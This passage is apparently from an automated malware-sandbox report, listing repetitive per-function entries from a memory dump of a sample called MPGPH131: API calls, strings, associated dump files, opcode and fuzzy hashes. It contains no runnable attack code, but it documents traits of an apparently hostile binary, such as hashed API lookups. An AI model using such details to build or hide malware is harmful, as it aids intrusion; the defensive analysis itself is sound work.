                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: value
                                  • API String ID: 4194217158-494360628
                                  • Opcode ID: 389300136a14fb1aefb9bb9f51709706e747904e90d9774e20e2989ad6d31912
                                  • Instruction ID: 2063a5277d8beb501146bb48b69c36a3d64032476f61f5054fc75d28bbe13a20
                                  • Opcode Fuzzy Hash: 389300136a14fb1aefb9bb9f51709706e747904e90d9774e20e2989ad6d31912
                                  • Instruction Fuzzy Hash: 5E519D71C00298DBDB14DBA4CC99B9EBFB5BF05304F148259E449A7382D7756A888B61
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00573C0F
                                    • Part of subcall function 0064E96B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0064B17A,?,006A09CC,00000000,?,00000000,-006A65B0), ref: 0064E9CB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionRaise___std_exception_copy
                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 3109751735-1866435925
                                  • Opcode ID: f2b8f0b6e0dacafade04c0a9a450e01c7165e0e1a84456768d78c23678690c36
                                  • Instruction ID: 0d9caaa546c0001440cf2de3432e7ca636dc8f30e409ee65f6add67a7f9bdaf4
                                  • Opcode Fuzzy Hash: f2b8f0b6e0dacafade04c0a9a450e01c7165e0e1a84456768d78c23678690c36
                                  • Instruction Fuzzy Hash: 7F11F0B2900708ABC710DF68E805A9ABBEDBF05320F14C52AF95C9B641F771A9149BA1
                                  APIs
                                  • GetConsoleOutputCP.KERNEL32(FAAA2064,00000000,00000000,?), ref: 00662685
                                    • Part of subcall function 00668463: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0066406B,?,00000000,-00000008), ref: 006684C4
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006628D7
                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0066291D
                                  • GetLastError.KERNEL32 ref: 006629C0
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                  • String ID:
                                  • API String ID: 2112829910-0
                                  • Opcode ID: a62f1481ad6d9ac293be52a7c779263690d720e0dc05d27b7a889ec89e52962d
                                  • Instruction ID: f17b1413410d9dca8c03b7b7d326bb3eb05e5e4af0e19ec35f7f7405bd07649d
                                  • Opcode Fuzzy Hash: a62f1481ad6d9ac293be52a7c779263690d720e0dc05d27b7a889ec89e52962d
                                  • Instruction Fuzzy Hash: 9BD19C75E006499FCF05CFE8D8909EDBBB6FF49310F18466AE456EB351D630A942CB50
                                  APIs
                                  • GetModuleHandleA.KERNEL32(B6BDACB9), ref: 0057A619
                                  • GetProcAddress.KERNEL32(00000000,AF88AC99), ref: 0057A624
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 0057A6A2
                                  • SetEvent.KERNEL32(00000000), ref: 0057A6A9
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Event$AddressCreateHandleModuleProc
                                  • String ID:
                                  • API String ID: 2341598627-0
                                  • Opcode ID: ee9f8b35cf51ce4c90e999790022f32240235b902f37b4d3129c1c1922229809
                                  • Instruction ID: ce44afcf5519c3579bb0b83363dca2b88c9bb4940be3ec3b9a0b540ff07963ab
                                  • Opcode Fuzzy Hash: ee9f8b35cf51ce4c90e999790022f32240235b902f37b4d3129c1c1922229809
                                  • Instruction Fuzzy Hash: 7B31C171914388EAEF04DFE4DC09BEEBBB9EF18304F10006DE545AA251E7B25648C7A6
                                  APIs
                                  • WideCharToMultiByte.KERNEL32(?,00000400,?,?,?,?,00000000,00000000,?,?,?,005D979F,00000000,?,?,00000000), ref: 0064B322
                                  • GetLastError.KERNEL32(?,005D979F,00000000,?,?,00000000,00000000,?,?), ref: 0064B32E
                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000,?,005D979F,00000000,?,?,00000000,00000000,?), ref: 0064B354
                                  • GetLastError.KERNEL32(?,005D979F,00000000,?,?,00000000,00000000,?,?), ref: 0064B360
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharErrorLastMultiWide
                                  • String ID:
                                  • API String ID: 203985260-0
                                  • Opcode ID: e8352121b1e2d14478df51de9c48f4102c9df151a8fc5b30d06c12291fbe35cd
                                  • Instruction ID: dff0b9cac6ede44f8ec709af540abcc6cfaaef23b490fa9d951451b010822e2b
                                  • Opcode Fuzzy Hash: e8352121b1e2d14478df51de9c48f4102c9df151a8fc5b30d06c12291fbe35cd
                                  • Instruction Fuzzy Hash: 60017236600155BBCF231F56DC08D9F3E67FBD97A5B546024FE1555220C731C862E7A1
                                  APIs
                                  • WriteConsoleW.KERNEL32(00000000,00000000,00656AF7,00000000,00000000,?,0066E99F,00000000,00000001,?,?,?,00662A14,?,00000000,00000000), ref: 00671C39
                                  • GetLastError.KERNEL32(?,0066E99F,00000000,00000001,?,?,?,00662A14,?,00000000,00000000,?,?,?,00662FEE,00000000), ref: 00671C45
                                    • Part of subcall function 00671C0B: CloseHandle.KERNEL32(FFFFFFFE,00671C55,?,0066E99F,00000000,00000001,?,?,?,00662A14,?,00000000,00000000,?,?), ref: 00671C1B
                                  • ___initconout.LIBCMT ref: 00671C55
                                    • Part of subcall function 00671BCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00671BFC,0066E98C,?,?,00662A14,?,00000000,00000000,?), ref: 00671BE0
                                  • WriteConsoleW.KERNEL32(00000000,00000000,00656AF7,00000000,?,0066E99F,00000000,00000001,?,?,?,00662A14,?,00000000,00000000,?), ref: 00671C6A
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                  • String ID:
                                  • API String ID: 2744216297-0
                                  • Opcode ID: 818ff077e8b47b57c76a38f1ff6e9370c9cd0581a008383efa80f9e30f0ba558
                                  • Instruction ID: af2f14e9fee3c8f912861ca6fa16226ec524f9f9829eb3809ce26e06098267bd
                                  • Opcode Fuzzy Hash: 818ff077e8b47b57c76a38f1ff6e9370c9cd0581a008383efa80f9e30f0ba558
                                  • Instruction Fuzzy Hash: 08F01C36140129BBCF226FD9DC08A893F27FB0A3A1F008119FA1D99620C632C9609B90
                                  Strings
                                  • unordered_map/set too long, xrefs: 005E2F43
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: unordered_map/set too long
                                  • API String ID: 0-306623848
                                  • Opcode ID: ac96d36ac91a1ded2ad4e5f893d5ebdcaefcd6de770654d9d4cd7c37a63712f6
                                  • Instruction ID: 0572a0fc90abdac97d34035cbdb5c0b3affa57a6f1548e447d6c34aa93b5a78a
                                  • Opcode Fuzzy Hash: ac96d36ac91a1ded2ad4e5f893d5ebdcaefcd6de770654d9d4cd7c37a63712f6
                                  • Instruction Fuzzy Hash: 16E1F571A001459FCB18DF69C885A6DBBB9FF88310F24836AE859DB395E730ED41CB90
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 0057844D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: parse error$ror
                                  • API String ID: 2659868963-4201802366
                                  • Opcode ID: 02c59634e9b8c7c7a731144dabbdfa952a9ed72f14cac93897f9034302d3c3c9
                                  • Instruction ID: 80d1fa4a4c241bb656b9895fb3e782abb6bb315f31c8fd7d556fcef8972cf41b
                                  • Opcode Fuzzy Hash: 02c59634e9b8c7c7a731144dabbdfa952a9ed72f14cac93897f9034302d3c3c9
                                  • Instruction Fuzzy Hash: A4C10671D106498FEB08CF68DC88BADBB72BF55304F14C24DE008AB792DBB49684DB91
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00578051
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00578060
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: [json.exception.
                                  • API String ID: 4194217158-791563284
                                  • Opcode ID: 055f89fcbf9ca259ca5448822265f3d12304b82d7286e48af308dcd21b1e024b
                                  • Instruction ID: daa32e71712766b3de9640baf24465b9050d8dad48f228090f175965fddd81bc
                                  • Opcode Fuzzy Hash: 055f89fcbf9ca259ca5448822265f3d12304b82d7286e48af308dcd21b1e024b
                                  • Instruction Fuzzy Hash: 3B9116709002089FDB18CFA8DC89BAEBFB6FF45314F14825DE404AB792D774AA84D791
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00573C0F
                                    • Part of subcall function 0064E96B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0064B17A,?,006A09CC,00000000,?,00000000,-006A65B0), ref: 0064E9CB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionRaise___std_exception_copy
                                  • String ID: ios_base::badbit set$ios_base::failbit set
                                  • API String ID: 3109751735-1240500531
                                  • Opcode ID: e58c1d961fee7ac21f141663b8c44451a8bb7e981d07e12a3aced7b5ee629868
                                  • Instruction ID: c8043547520b72f85efa22c8b1e067a8f09e83ca2d5cc74fb0b1df1e2a57f2dd
                                  • Opcode Fuzzy Hash: e58c1d961fee7ac21f141663b8c44451a8bb7e981d07e12a3aced7b5ee629868
                                  • Instruction Fuzzy Hash: 9841F4B1910204ABC704DF68DC45BAAFBB9FF45320F14C21EF91C9B681E770AA40DBA1
                                  APIs
                                    • Part of subcall function 0064E96B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0064B17A,?,006A09CC,00000000,?,00000000,-006A65B0), ref: 0064E9CB
                                  • ___std_fs_directory_iterator_open@12.LIBCPMT ref: 0057644F
                                  • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0057646A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionRaise___std_fs_directory_iterator_advance@8___std_fs_directory_iterator_open@12
                                  • String ID: exists
                                  • API String ID: 1297148070-2996790960
                                  • Opcode ID: c43037f33be3b9858c81d9d278a7d8af6f11dd7e7b8b24d4e45428df7deef711
                                  • Instruction ID: b4c556fd099329a27958afa6282edcfba7e9ccc4cf8f1af42ebec8bbe268ecf3
                                  • Opcode Fuzzy Hash: c43037f33be3b9858c81d9d278a7d8af6f11dd7e7b8b24d4e45428df7deef711
                                  • Instruction Fuzzy Hash: 5641F372900604ABCF10DF59DD85BAAFBB9FB44720F048269EC18A3781EB356D14DBE1
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E4E29
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E4E42
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E594D
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E5966
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: value
                                  • API String ID: 4194217158-494360628
                                  • Opcode ID: 7f0ec6ac63b1e714348d93ce5ea9fcbb2f263dd01ba6f74fa7aaaf9d2f4caf81
                                  • Instruction ID: 9c57c5b074271b6f6070b71f4fb255c1ef998c92ed2daac337d17cfb051f85f3
                                  • Opcode Fuzzy Hash: 7f0ec6ac63b1e714348d93ce5ea9fcbb2f263dd01ba6f74fa7aaaf9d2f4caf81
                                  • Instruction Fuzzy Hash: CE51A070C00298DBDB18DFA4CC99BDEBFB5BF15314F148259E445AB382D7746A88CB52
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 005E99F1
                                  Strings
                                  • type must be string, but is , xrefs: 005E9A58
                                  • type must be boolean, but is , xrefs: 005E9AE2
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
